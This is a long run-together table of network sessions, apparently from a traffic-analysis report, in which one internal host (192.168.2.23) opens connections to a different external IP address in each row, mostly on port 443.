                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18806192.168.2.2346412178.82.209.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18807192.168.2.23483009.238.0.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18808192.168.2.2346626162.237.29.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18809192.168.2.234335025.78.167.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18810192.168.2.233345270.81.107.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18811192.168.2.2336182137.188.166.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18812192.168.2.2352848219.168.14.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18813192.168.2.2352702111.176.91.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18814192.168.2.2339016203.62.178.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18815192.168.2.233696857.121.148.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18816192.168.2.2347282136.247.5.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18817192.168.2.234951254.153.18.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18818192.168.2.2338286108.3.227.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18819192.168.2.235789019.101.51.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18820192.168.2.2345890204.122.79.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18821192.168.2.2339588137.89.139.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18822192.168.2.2335224187.66.180.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18823192.168.2.233833044.8.171.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18824192.168.2.233392637.111.117.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18825192.168.2.234495680.149.23.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18826192.168.2.2353416188.101.199.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18827192.168.2.2360712111.115.75.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18828192.168.2.23440589.225.242.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18829192.168.2.2347168132.245.141.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18830192.168.2.2348134147.217.181.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18831192.168.2.2355426105.138.200.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18832192.168.2.2350298222.184.116.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18833192.168.2.233650867.76.240.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18834192.168.2.234898876.249.245.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18835192.168.2.2355952168.245.166.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18836192.168.2.2358900190.25.70.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18837192.168.2.235868293.99.51.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18838192.168.2.2341124164.95.255.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18839192.168.2.2342232166.145.246.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18840192.168.2.2338630185.207.104.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18841192.168.2.233649036.233.165.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18842192.168.2.2358220106.160.95.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18843192.168.2.2338306110.162.135.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18844192.168.2.234845042.122.176.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18845192.168.2.233485861.21.8.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18846192.168.2.234092258.38.14.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18847192.168.2.235498019.168.232.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18848192.168.2.2353434152.251.13.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18849192.168.2.23442042.40.153.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18850192.168.2.2332890128.69.41.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18851192.168.2.2338814212.202.78.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18852192.168.2.234701691.67.122.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18853192.168.2.235936083.10.178.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18854192.168.2.2359686162.132.152.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18855192.168.2.233317239.8.79.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18856192.168.2.2355172205.242.65.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18857192.168.2.2341584117.154.71.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18858192.168.2.235676646.120.193.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18859192.168.2.235002041.255.16.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18860192.168.2.235465213.21.187.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18861192.168.2.234852885.131.89.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18862192.168.2.2345432152.187.82.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18863192.168.2.2356006144.161.167.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18864192.168.2.2336374158.57.159.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18865192.168.2.2348314113.108.101.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18866192.168.2.233357890.215.181.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18867192.168.2.233726871.156.117.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18868192.168.2.2353758168.148.209.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18869192.168.2.2359062208.146.195.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18870192.168.2.2333048217.161.72.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18871192.168.2.2344672155.148.67.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18872192.168.2.2353588112.43.134.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18873192.168.2.234348435.202.146.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18874192.168.2.234151094.243.212.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18875192.168.2.235338893.123.248.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18876192.168.2.234641645.156.115.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18877192.168.2.235086257.135.43.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18878192.168.2.2350584162.34.231.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18879192.168.2.233459038.171.224.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18880192.168.2.2359832102.19.201.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18881192.168.2.2340774190.67.18.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18882192.168.2.2353350131.55.101.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18883192.168.2.2341268157.155.69.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18884192.168.2.2340604191.197.8.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18885192.168.2.2358786193.253.69.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18886192.168.2.2359682202.232.92.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18887192.168.2.2350136177.185.252.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18888192.168.2.233682253.223.203.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18889192.168.2.2340870121.25.190.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18890192.168.2.2341916206.61.37.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18891192.168.2.2341094144.145.101.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18892192.168.2.2337992133.134.250.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18893192.168.2.2336396149.81.20.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18894192.168.2.2349710218.236.212.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18895192.168.2.2342698162.208.218.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18896192.168.2.2353790125.40.169.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18897192.168.2.235689877.192.52.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18898192.168.2.2337190207.234.166.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18899192.168.2.235124066.12.39.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18900192.168.2.2346998122.247.15.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18901192.168.2.2340494176.108.155.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18902192.168.2.2353776222.167.80.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18903192.168.2.2333480136.181.237.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18904192.168.2.2342736210.252.251.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18905192.168.2.234209081.142.241.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18906192.168.2.2348912195.72.212.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18907192.168.2.2338998114.216.38.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18908192.168.2.2338194149.170.12.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18909192.168.2.2349412109.9.244.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18910192.168.2.2346338197.145.14.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18911192.168.2.234266893.24.194.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18912192.168.2.2352906102.125.249.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18913192.168.2.235313024.224.213.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18914192.168.2.2340564177.242.143.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18915192.168.2.2339808142.20.171.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18916192.168.2.2357432176.49.194.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18917192.168.2.233625877.151.81.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18918192.168.2.2351446111.66.94.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18919192.168.2.2332948183.216.248.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18920192.168.2.23562529.19.246.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18921192.168.2.233834261.22.90.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18922192.168.2.2360898154.129.224.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18923192.168.2.234669657.206.90.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18924192.168.2.2357316203.80.252.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18925192.168.2.2339026153.111.227.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18926192.168.2.2342086219.217.172.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18927192.168.2.2334122119.234.32.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18928192.168.2.2339406155.13.87.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18929192.168.2.2355766123.133.45.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18930192.168.2.235786468.12.173.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18931192.168.2.2360050213.195.180.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18932192.168.2.234256657.78.230.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18933192.168.2.2336676154.216.43.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18934192.168.2.235236460.171.13.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18935192.168.2.2332982197.202.138.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18936192.168.2.235066865.253.254.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18937192.168.2.2347514164.186.181.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18938192.168.2.2350910194.248.200.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18939192.168.2.2336936133.242.229.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18940192.168.2.2341560101.17.84.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18941192.168.2.235757475.188.153.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18942192.168.2.2338436201.28.10.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18943192.168.2.233972298.47.89.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18944192.168.2.2341604212.87.169.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18945192.168.2.2348368218.166.223.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18946192.168.2.234346884.216.225.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18947192.168.2.2334866161.111.0.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18948192.168.2.2351408129.153.31.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18949192.168.2.234952677.218.17.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18950192.168.2.2354746183.208.149.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18951192.168.2.2348796165.77.160.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18952192.168.2.235230283.159.137.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18953192.168.2.2342794202.194.80.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18954192.168.2.2350148155.67.67.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18955192.168.2.234253268.6.38.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18956192.168.2.2339166182.20.131.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18957192.168.2.2333708111.187.110.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18958192.168.2.2334254220.10.71.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18959192.168.2.233333448.76.7.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18960192.168.2.2356336100.187.43.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18961192.168.2.2351068216.189.126.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18962192.168.2.2339056161.43.14.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18963192.168.2.233730070.99.121.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18964192.168.2.2338820156.38.146.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18965192.168.2.233291617.209.254.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18966192.168.2.2349554147.51.78.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18967192.168.2.2357520128.204.83.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18968192.168.2.234844475.15.157.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18969192.168.2.2357534107.69.1.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18970192.168.2.2339598146.24.13.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18971192.168.2.2335270153.65.190.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18972192.168.2.235629038.80.232.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18973192.168.2.2349776102.240.50.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18974192.168.2.2346282222.167.231.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18975192.168.2.2352356168.111.173.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18976192.168.2.2336170148.185.156.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18977192.168.2.2359510219.2.133.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18978192.168.2.2340824106.66.3.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18979192.168.2.2360722133.197.51.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18980192.168.2.2341052156.251.83.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18981192.168.2.236088220.217.130.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18982192.168.2.235472643.18.192.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18983192.168.2.2356918174.196.254.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18984192.168.2.2351456113.215.20.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18985192.168.2.235689695.215.48.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18986192.168.2.236053674.93.219.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18987192.168.2.233816467.14.95.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18988192.168.2.2356978110.158.156.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18989192.168.2.2352474131.110.153.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18990192.168.2.235210013.91.148.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18991192.168.2.2335914161.74.147.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18992192.168.2.235447213.147.255.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18993192.168.2.23384405.245.31.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18994192.168.2.235483273.60.96.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18995192.168.2.2358006136.108.207.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18996192.168.2.2360360166.31.103.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18997192.168.2.2356994204.51.21.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18998192.168.2.2334518153.14.97.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18999192.168.2.2352278140.154.61.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19000192.168.2.2348866120.173.138.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19001192.168.2.2339878141.100.206.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19002192.168.2.234027495.149.85.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19003192.168.2.233663469.129.21.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19004192.168.2.234978814.162.162.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19005192.168.2.233586679.175.27.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19006192.168.2.2335230174.16.210.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19007192.168.2.235436894.94.110.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19008192.168.2.233968673.38.253.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19009192.168.2.233626292.214.71.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19010192.168.2.235924845.115.34.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19011192.168.2.234215458.104.45.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19012192.168.2.2339348182.29.186.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19013192.168.2.234613247.156.151.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19014192.168.2.2352292116.23.116.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19015192.168.2.2346622115.165.95.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19016192.168.2.235871231.33.14.758080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19017192.168.2.2336182201.99.154.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19018192.168.2.2342736126.63.106.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19019192.168.2.2352560123.112.43.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19020192.168.2.2344596121.38.167.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19021192.168.2.2349064172.159.94.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19022192.168.2.2347598128.142.202.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19023192.168.2.2337948140.109.63.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19024192.168.2.2351848110.184.156.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19025192.168.2.2333898147.94.208.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19026192.168.2.2348162187.96.109.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
